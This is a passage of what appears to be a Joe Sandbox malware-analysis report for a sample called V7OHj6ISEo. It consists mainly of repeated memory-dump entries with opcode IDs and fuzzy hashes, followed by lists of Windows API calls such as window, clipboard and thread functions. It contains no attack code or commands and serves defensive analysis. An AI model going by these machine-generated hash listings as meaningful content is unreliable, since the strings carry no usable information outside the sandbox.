                                                                                                            • Instruction Fuzzy Hash: 7BC1A074E00218CFDB58DFA5D994B9DBBB2BF89300F2081A9D809BB355DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e854f4d7b290826178e9e81d9da1b503799fa449c54b0fc8e19c39314ea9dbb2
                                                                                                            • Instruction ID: 2163550c2c3bc532b9004269ba8f2d53b2296052d69aca4d8096f0bd7c661498
                                                                                                            • Opcode Fuzzy Hash: e854f4d7b290826178e9e81d9da1b503799fa449c54b0fc8e19c39314ea9dbb2
                                                                                                            • Instruction Fuzzy Hash: 83C1A074E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2b07d8c790716bf81893b41ad6cd52d5fda320336a75bece305ecead2cb3fdab
                                                                                                            • Instruction ID: f484ffcc83055e184323ec41772655a78fc3d049337069a8eeafd192cf28bae8
                                                                                                            • Opcode Fuzzy Hash: 2b07d8c790716bf81893b41ad6cd52d5fda320336a75bece305ecead2cb3fdab
                                                                                                            • Instruction Fuzzy Hash: 68C1A174E00218CFDB58DFA5C994B9DBBB2AF89300F1081A9D809BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ad791b9f06cfb2713e1594b49994effd693d274ca91234631e7af469b748562
                                                                                                            • Instruction ID: 75045d31fc91d72362d829581018949631381ca7239040c56aa4348fd6aaa78b
                                                                                                            • Opcode Fuzzy Hash: 5ad791b9f06cfb2713e1594b49994effd693d274ca91234631e7af469b748562
                                                                                                            • Instruction Fuzzy Hash: 46C19074E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d73adbea00a8ee1a1bc2f2398104be098ea32fef81b43aa43c957f0f11ab1af
                                                                                                            • Instruction ID: fa7d310f2bb583bf51c1ee6087a9e8a67db8fcf16f502a469aa37c0b52dd1dbc
                                                                                                            • Opcode Fuzzy Hash: 5d73adbea00a8ee1a1bc2f2398104be098ea32fef81b43aa43c957f0f11ab1af
                                                                                                            • Instruction Fuzzy Hash: 44C1A174E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01d6445dc9e368be3f0881e8bfde7ad91687a3301ff41b8a0b289544bc3c45e5
                                                                                                            • Instruction ID: b329e32dc95c16b8d8d0d77b9ec04db813521ec1f96a388065fff9478c9fd260
                                                                                                            • Opcode Fuzzy Hash: 01d6445dc9e368be3f0881e8bfde7ad91687a3301ff41b8a0b289544bc3c45e5
                                                                                                            • Instruction Fuzzy Hash: 6DC1A174E00218CFDB58DFA5C994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 832523079900365f6fa1ea239c4a3a0d91ff0bf7d967b671bf78878597902299
                                                                                                            • Instruction ID: 785d42e2d1c37653bfc47d03e7362b2a5895a68dbd94e59fb58afc9790f3530a
                                                                                                            • Opcode Fuzzy Hash: 832523079900365f6fa1ea239c4a3a0d91ff0bf7d967b671bf78878597902299
                                                                                                            • Instruction Fuzzy Hash: 1EC19174E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fdcf93779ee5415a68530a993b228694edb7a356eda5eb4d136376e30ff7625c
                                                                                                            • Instruction ID: a899db364c02fe4c4cb52b77add58edc69c28f19003f594917ce7d2359fd1ee9
                                                                                                            • Opcode Fuzzy Hash: fdcf93779ee5415a68530a993b228694edb7a356eda5eb4d136376e30ff7625c
                                                                                                            • Instruction Fuzzy Hash: B2C1A274E00218CFDB58DFA5D994B9DBBB2AF89300F1081A9D809BB355DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4630ac4dff25c26cff206aac5411e4b0962903f138e8ab355ba8448e770803fe
                                                                                                            • Instruction ID: 523b5510e7845f1668da949ba174fefbc146bde3e09336d6460e75805ababcc3
                                                                                                            • Opcode Fuzzy Hash: 4630ac4dff25c26cff206aac5411e4b0962903f138e8ab355ba8448e770803fe
                                                                                                            • Instruction Fuzzy Hash: E3C19174E00218CFEB58DFA5D994B9DBBB2BF89300F1081A9D809AB355DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a0ca5b0ea770f75d68d93b03398d5c57705d098b0ea90386f35ccff5bc2bb77
                                                                                                            • Instruction ID: 7738b7551a862ff63832e260c1cfaad97272fd21efd27e35424a4ae5d72cb8be
                                                                                                            • Opcode Fuzzy Hash: 6a0ca5b0ea770f75d68d93b03398d5c57705d098b0ea90386f35ccff5bc2bb77
                                                                                                            • Instruction Fuzzy Hash: 66C1B074E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c1de1e96a21bbaded691dd02da9acc6f8c121e8e808cb442dd37f7232fcfac22
                                                                                                            • Instruction ID: 5fa6c6e2146b446dcabce46fb0908b4ed0d9ed287001971a99a449db13fc86d8
                                                                                                            • Opcode Fuzzy Hash: c1de1e96a21bbaded691dd02da9acc6f8c121e8e808cb442dd37f7232fcfac22
                                                                                                            • Instruction Fuzzy Hash: A8C19174E00218CFDB58DFA5D994B9DBBB2AF89300F1081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08c44833467bd3cc678f5749cc64e21f3c942046ef0bd427a08c9bf4bf0a6a5a
                                                                                                            • Instruction ID: f1232efeaf1ed91afed96a7e4d2e7761ea8d19b947161dd5482a541a0ca6ac60
                                                                                                            • Opcode Fuzzy Hash: 08c44833467bd3cc678f5749cc64e21f3c942046ef0bd427a08c9bf4bf0a6a5a
                                                                                                            • Instruction Fuzzy Hash: 5BC19F74E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c7bf6db8620ce5ef45a23a9c2303739cec4e19cc86547270332ed3c5e3acbbe
                                                                                                            • Instruction ID: 7212475a354d5a922f6e397c9e0a37b7a9403e5833926972e81b5d49d0e11d03
                                                                                                            • Opcode Fuzzy Hash: 7c7bf6db8620ce5ef45a23a9c2303739cec4e19cc86547270332ed3c5e3acbbe
                                                                                                            • Instruction Fuzzy Hash: BCC19174E00218CFEB58DFA5D994B9DBBB2AF89300F1081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d7b7d3f5a2d76b64d1e6042f5c7a2f9940c5bd9dc8d6281cd1c4d9776a764ef
                                                                                                            • Instruction ID: 89a7b5d10f60a8bcc6503265319cc0970fab2beded5c2c055cabd50f831dc700
                                                                                                            • Opcode Fuzzy Hash: 5d7b7d3f5a2d76b64d1e6042f5c7a2f9940c5bd9dc8d6281cd1c4d9776a764ef
                                                                                                            • Instruction Fuzzy Hash: D3C1A174E00218CFDB58DFA9D994B9DBBB2AF89300F1081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb3aa605fe31263cc31f5445de5765965a65a4ec0ccf3e9176dfad967f8d233e
                                                                                                            • Instruction ID: 0597bf4e71553b4a607a5b5ba59cdebe4ba425a818bc418cfce1686675366098
                                                                                                            • Opcode Fuzzy Hash: eb3aa605fe31263cc31f5445de5765965a65a4ec0ccf3e9176dfad967f8d233e
                                                                                                            • Instruction Fuzzy Hash: 28C1B074E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33a2bb24a9ac46bd9a872327858c9f68970533e8ac7cb31c28c2621dd4cf3861
                                                                                                            • Instruction ID: a3463de6433718f394d857b8329a84dd3d7e83555d8a6e0a6cd76c2cb5f86496
                                                                                                            • Opcode Fuzzy Hash: 33a2bb24a9ac46bd9a872327858c9f68970533e8ac7cb31c28c2621dd4cf3861
                                                                                                            • Instruction Fuzzy Hash: 21C19174E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 54ffa1d323de53f4f35a3cf17cd2302a30c246eed8a1259cde8095d72d71132b
                                                                                                            • Instruction ID: b4eaa2f91d4b5d3961d5f76c4259756ed8193f7161bab3abc30868106ee99c11
                                                                                                            • Opcode Fuzzy Hash: 54ffa1d323de53f4f35a3cf17cd2302a30c246eed8a1259cde8095d72d71132b
                                                                                                            • Instruction Fuzzy Hash: CAC1B274E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809BB355DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0fd54922f65f0ec3d9a79655b25d54d66cc5d530cd4bdcb8c5ea59e469a9a2b6
                                                                                                            • Instruction ID: 05c6a7fcc41edf3aceb7f93c16ba0736933273b7b50031a5c8c8dbf4c578d119
                                                                                                            • Opcode Fuzzy Hash: 0fd54922f65f0ec3d9a79655b25d54d66cc5d530cd4bdcb8c5ea59e469a9a2b6
                                                                                                            • Instruction Fuzzy Hash: 6BC19174E00218CFDB58DFA5D994B9DBBB2BF89300F1081A9D809AB355DB355A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d20e23e5fff14d27bd4ad11a63426fb7ace77df29c307867de664844161e8f4b
                                                                                                            • Instruction ID: 713a9a81ab0c06e113c3e516e4dc4f75c61cfdbe02b043914e462dca71c953b6
                                                                                                            • Opcode Fuzzy Hash: d20e23e5fff14d27bd4ad11a63426fb7ace77df29c307867de664844161e8f4b
                                                                                                            • Instruction Fuzzy Hash: 0DC19274E00218CFDB58DFA5D994B9DBBB2BF89300F1081A9D809AB355DB356E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a147b7b0199010dc036eb209517b142a44492579980d444922c94d083f7d85af
                                                                                                            • Instruction ID: ef7a3f9b5b069aede0be8578f8aec9f538542084b8ed9b225de6dc2afccc7b33
                                                                                                            • Opcode Fuzzy Hash: a147b7b0199010dc036eb209517b142a44492579980d444922c94d083f7d85af
                                                                                                            • Instruction Fuzzy Hash: B5C1A174E00218CFDB58DFA5D994B9DBBB2AF89300F1081A9D809BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0d1206d9bf2c86dbe7736929b9dbdd8dfe72d9ed993fba07e16af07f13bb22e
                                                                                                            • Instruction ID: 302aa6d8bf660aad9f9ae2ffb6e01442a8f311a3158a99903de47034aaaa195f
                                                                                                            • Opcode Fuzzy Hash: b0d1206d9bf2c86dbe7736929b9dbdd8dfe72d9ed993fba07e16af07f13bb22e
                                                                                                            • Instruction Fuzzy Hash: CEC19174E00218CFDB58DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d23338c21f336fd61e5047fdb76bca800bebe4c3134cc92ac17dfee4008836b2
                                                                                                            • Instruction ID: af1ffebf0cd7f724797e597f78ea6081ac453937bb55896fcddaf02bb9234d86
                                                                                                            • Opcode Fuzzy Hash: d23338c21f336fd61e5047fdb76bca800bebe4c3134cc92ac17dfee4008836b2
                                                                                                            • Instruction Fuzzy Hash: 48C1B074E00218CFDB58DFA5D994B9DBBB2AF89300F1081A9D809AB355DB355E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2d67e7bd807d0344ec99658df0797d625365404c9fa42b9c7a0e08005ceb7655
                                                                                                            • Instruction ID: d02e189cc2f7f467954332238ff8f14f21d90a841b1bc3e231dd4778414d9359
                                                                                                            • Opcode Fuzzy Hash: 2d67e7bd807d0344ec99658df0797d625365404c9fa42b9c7a0e08005ceb7655
                                                                                                            • Instruction Fuzzy Hash: C1C1A174E00218CFEB18DFA5D995B9DBBB2BF89300F2081A9D809BB355DB355A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1cebe72927806b28149001c281c9a6664eeba6785b1a2d523429fb5a0c83fda
                                                                                                            • Instruction ID: d6badf363b4199d58ecd48314961849282528e7fe46d9ab19e6371d16ebb0b3d
                                                                                                            • Opcode Fuzzy Hash: b1cebe72927806b28149001c281c9a6664eeba6785b1a2d523429fb5a0c83fda
                                                                                                            • Instruction Fuzzy Hash: 7BC19274E00218CFDB18DFA5D995B9DBBB2BF89300F1081A9D809BB355DB355A86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5076469e326544e0227b25d9faa1307e220fb55f55e0beb731205658bea7b65
                                                                                                            • Instruction ID: 775477e9f96194dda7763678f1d4cc362748b8d6b5cb9aaad22ae1414e0b992c
                                                                                                            • Opcode Fuzzy Hash: b5076469e326544e0227b25d9faa1307e220fb55f55e0beb731205658bea7b65
                                                                                                            • Instruction Fuzzy Hash: E0C19174E00218CFDB18DFA5D994B9DBBB2BF89300F6081A9D819BB355DB355A86CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc4b35ffae44585586e2fe384765a1a1aaa3d1d1c56ccf1c79b79a94a5751753
                                                                                                            • Instruction ID: 3244e17bc1b60ecffb6dfd1a7124fc613a867af8534c4a1a8c8811e73af99bdf
                                                                                                            • Opcode Fuzzy Hash: cc4b35ffae44585586e2fe384765a1a1aaa3d1d1c56ccf1c79b79a94a5751753
                                                                                                            • Instruction Fuzzy Hash: D6C19174E00218CFDB18DFA5D994B9DBBB2BF89300F6081A9D809BB355DB355A85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a80608394077a80cfb21176caa5c915392b11da55b104e35b31340d886b93107
                                                                                                            • Instruction ID: b7727ebf7c8c6e01cbbabf307d8024bafc11676a40f08c4fa7992d46a48ca783
                                                                                                            • Opcode Fuzzy Hash: a80608394077a80cfb21176caa5c915392b11da55b104e35b31340d886b93107
                                                                                                            • Instruction Fuzzy Hash: BFC1A074E00218CFDB18DFA5D995B9DBBB2BF89300F6081A9D809BB355DB359A85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72b0e5988bec005f8e8a3b9644efd73e94764d04a3e41ad3805eaf9e18c95194
                                                                                                            • Instruction ID: f7a1635006e758c036034953f9137d216621c23f8bffdfb37e085e2208037409
                                                                                                            • Opcode Fuzzy Hash: 72b0e5988bec005f8e8a3b9644efd73e94764d04a3e41ad3805eaf9e18c95194
                                                                                                            • Instruction Fuzzy Hash: A6D09E75E1421C8BCB25DFA8E8402ECF770EBAA311F0124E6D54DBB210D7715A918F56
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
